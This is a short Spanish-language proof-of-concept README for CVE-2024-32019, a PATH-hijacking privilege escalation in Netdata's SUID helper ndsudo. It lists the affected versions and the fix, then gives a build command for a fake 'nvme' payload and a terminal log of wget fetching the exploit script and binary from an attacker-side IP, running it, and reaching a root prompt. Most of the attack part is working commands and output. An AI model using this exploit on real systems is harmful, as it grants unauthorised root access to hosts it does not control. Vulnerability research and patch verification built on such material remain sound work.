
Netdata ndsudo PoC de escalada de privilegios
CVE-2024-32019 es una vulnerabilidad local de escalada de privilegios en el helper SUID ndsudo de Netdata que permite a un usuario local ejecutar programas arbitrarios como root a través de una ruta de búsqueda no confiable (secuestro de PATH).
El problema existe porque ndsudo restringe los nombres de los comandos pero los resuelve usando el PATH del llamador, permitiendo a un usuario colocar un binario malicioso antes en el PATH y hacer que ndsudo lo ejecute con privilegios de root.
Afecta a las versiones del Agente Netdata ≥ v1.45.0 y < v1.45.3, y ≥ v1.44.0-60 y < v1.45.0-169, y tiene una puntuación CVSS v3.1 de 8.8 (Alta).
La mitigación consiste en actualizar a v1.45.3 o v1.45.0-169; la debilidad se asigna a CWE-426 (Ruta de Búsqueda No Confiable).
gcc -static payload.c -o nvme -Wall -Werror -Wpedantic
test@ubuntu:/tmp$ wget http://192.168.100.7:8000/CVE-2024-32019.sh
--2025-09-10 23:49:01-- http://192.168.100.7:8000/CVE-2024-32019.sh
Connecting to 192.168.100.7:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 712 [application/x-sh]
Saving to: ‘CVE-2024-32019.sh’
CVE-2024-32019.sh 100%[==================================================>] 712 --.-KB/s in 0s
2025-09-10 23:49:01 (57.1 MB/s) - ‘CVE-2024-32019.sh’ saved [712/712]
test@ubuntu:/tmp$ wget http://192.168.100.7:8000/nvme
--2025-09-10 23:49:10-- http://192.168.100.7:8000/nvme
Connecting to 192.168.100.7:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 832552 (813K) [application/octet-stream]
Saving to: ‘nvme’
nvme 100%[==================================================>] 813.04K 1.98MB/s in 0.4s
2025-09-10 23:49:11 (1.98 MB/s) - ‘nvme’ saved [832552/832552]
test@ubuntu:/tmp$ sh CVE-2024-32019.sh
[+] ndsudo found at: /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo
[+] File 'nvme' found in the current directory.
[+] Execution permissions granted to ./nvme
[+] Running ndsudo with modified PATH:
root@ubuntu:/tmp#